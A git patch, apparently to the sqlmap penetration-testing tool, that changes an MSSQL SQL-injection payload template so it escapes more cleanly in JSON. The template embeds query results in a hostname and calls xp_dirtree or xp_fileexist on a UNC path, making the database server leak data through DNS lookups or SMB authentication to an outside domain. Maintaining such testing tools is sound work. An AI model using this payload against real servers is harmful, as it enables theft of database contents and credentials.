From 4d259790cd0d3ccb3991fc99f7fb01ecffbf93e6 Mon Sep 17 00:00:00 2001
From: Jason Juntunen <29318503+missing0x00@users.noreply.github.com>
Date: Thu, 23 Jan 2025 21:14:45 -0600
Subject: [PATCH] Change MSSQL dns_request.sql to reduce escaping issues

Modified the xp_dirtree and xp_cmdshell UNC paths to use forward slashes instead of backslashes, and removed the space between the procedure name and quoted path.

These changes help to avoid escaping/encoding issues, for example when using JSON. MSSQL still handles it the same way and will cause a DNS query or SMB authentication attempt.
---
 data/procs/mssqlserver/dns_request.sql | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/data/procs/mssqlserver/dns_request.sql b/data/procs/mssqlserver/dns_request.sql
index a269c7e16..782d39608 100644
--- a/data/procs/mssqlserver/dns_request.sql
+++ b/data/procs/mssqlserver/dns_request.sql
@@ -1,4 +1,4 @@
 DECLARE @host varchar(1024);
 SELECT @host='%PREFIX%.'+(%QUERY%)+'.%SUFFIX%.%DOMAIN%';
-EXEC('master..xp_dirtree "\\'+@host+'\%RANDSTR1%"')
-# or EXEC('master..xp_fileexist "\\'+@host+'\%RANDSTR1%"')
+EXEC('master..xp_dirtree"//'+@host+'/%RANDSTR1%"')
+# or EXEC('master..xp_fileexist"//'+@host+'/%RANDSTR1%"')